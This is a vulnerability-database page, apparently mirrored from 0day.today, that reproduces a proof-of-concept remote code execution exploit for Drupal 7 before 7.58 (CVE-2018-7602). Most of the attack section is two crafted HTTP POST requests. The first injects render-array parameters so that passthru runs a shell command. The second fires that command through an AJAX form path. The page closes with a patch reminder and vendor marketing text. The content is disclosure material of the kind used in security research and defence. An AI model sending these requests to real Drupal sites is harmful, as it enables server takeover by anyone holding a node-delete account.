Lucene search
K

Drupal < 7.58 - drupalgeddon3 Authenticated Remote Code Execution (PoC) Exploit

🗓️ 26 Apr 2018 00:00:00Reported by BlaklisType 
zdt
 zdt
🔗 0day.today👁 147 Views

Drupal 7.58 SA-CORE-2018-004/CVE-2018-7602 Authenticated Remote Code Executio

Related
Code
This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.
 
You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).
 
POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]
 
Retrieve the form_build_id from the response, and then triggering the exploit with : 
 
POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]
 
This will display the result of the whoami command.
 
Patch your systems!
Blaklis

#  0day.today [2018-04-26]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation